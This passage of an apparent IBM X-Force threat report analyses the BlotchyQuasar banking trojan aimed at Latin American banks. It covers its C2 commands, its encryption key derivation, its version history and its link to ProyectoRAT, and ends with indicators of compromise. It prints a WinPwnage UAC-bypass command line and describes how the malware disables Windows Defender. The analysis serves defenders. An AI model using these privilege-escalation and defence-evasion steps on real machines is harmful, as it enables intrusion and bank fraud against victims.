The return message states: “HVNC Connected”.
Command: “CerrarProceso” (Name):
Kills all processes with the specified name.
Command: “metodo” (ID):
First it checks if a file exists at
- C:pypython.exe
Then, the currently running executable is copied into the C:py directory. The mutex is closed and the following command run:
C:pypython.exe C:pymain.py –use uac –id <ID> –payload C:py<malware_exe_path> |
This command is part of WinPwnage and attempts to elevate the privileges of the running trojan.
Command: “DisaDef” ():
Runs the same functions as during initialization, with the goal of disabling Windows Defender and UAC via various commands and registry alterations.
Command: “Rename” (Name):
Changes the client name e.g. how the victim is displayed on the C2 panel.
Encryption
The encryption used to hide the pastebin address and the final C2 server is a simple implementation, which can be found in various projects online.
It uses the MD5 hash of the string “qualityinfosolutions” as a key for the TripleDES encryption algorithm.
Version updates
According to X-Force comparisons of recent versions, the banking trojan project is under active development and has been for more than two years. The most recent addition (in Version 5 – 9058) is the Google Chrome Kiosk mode feature (HtmlVN_C command), which was likely developed in early 2023. The custom UAC Bypass command (BY_UA_C) was introduced in Version 4. The oldest versions dating back to 2020 had further custom UAC Bypass methods such as Silentcleanup and CMSTP-based, however, they were replaced with the integration of the WinPwnage Python tool.
Overlap with ProyectoRAT
During analysis, X-Force found several similarities with a malware called “ProyectoRAT” reported in 2019, targeting users in Latin America via similar phishing emails as Migracion Colombia. Just like BlotchyQuasar, ProyectoRAT was a modification of a different RAT called XpertRAT. It also had a feature “CAP”, similar to BlotchyQuasar’s “CaptionView”, which compares the window titles to a list of hardcoded strings in regular intervals. Although the list has been updated, a few of the same caption-strings of Latin American banks are used by BlotchyQuasar as well. Lastly, the parsing of the C2 server also bears some similarity, since both extract strings between the ‘¡’ character. Therefore, it is likely that BlotchyQuasar is a greatly improved version of the original ProyectoRAT malware, with the possibility of them sharing the same developer.
Hive0129 and BlotchyQuasar: Notable impacts to Latin America
In comparison to the large threat landscape of banking trojans impacting the LATAM region, BlotchyQuasar clearly stands out. Most banking trojans such as Ousaban or Grandoreiro are developed in Delphi, whereas .NET is used far less. However, many of BlotchyQuasar’s sophisticated capabilities are shared with other banking trojans, such as the installation of root certificates, the use of proxy auto-config as well as a facilitation for hidden-VNC tools. It is also less likely to be detected as a banking trojan, due to its use of commodity loaders and the well-known QuasarRAT code-base, which acts as a smokescreen. Nevertheless, BlotchyQuasar boasts all features of a classic banking trojan with the ability to detect, manipulate and impersonate targeted banking applications for financial gain.
This campaign highlights Hive0129’s continued trend of increasingly frequent and sophisticated malicious cyber activity targeting the Latin American region. Hive0129 continues to improve their toolset, including both open-source and custom tools, and are employing more complex attack chains and sophisticated techniques (such as Mark of the Web bypassing and living off the land.) X-Force assesses that it is highly likely that Hive0129 will continue to enhance their tools and continue to conduct phishing operations within the Latin America region. Entities within their targeting profile should search for existing signs of the indicated IoCs below in your environment and continue monitoring available intelligence to ensure they are able to mitigate their rapidly evolving tools and TTPs.
Indicators of Compromise
Indicator |
Indicator Type |
Context |
|
URL |
Geofenced download URL |
ecc4f23a3e3b6021f952d1c715739ced6997882ad023fa0d8eeedb87a55993e5 |
SHA256 |
Encrypted LHA archive |
dc71d0f6cd67a4a5d606efdf0fe8ab734f73784516fe4e5b8ea5e69b6d130375 |
SHA256 |
Packed BlotchyQuasar |
ecuadorlab[.]work[.]gd:9058 |
Domain |
C2 server |
To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence, or offensive security services schedule a meeting here: IBM X-Force Scheduler.
If you are experiencing cybersecurity issues or an incident, contact X-Force to help: US hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.
The post BlotchyQuasar: X-Force Hive0129 targeting financial intuitions in LATAM with a custom banking trojan appeared first on Security Intelligence.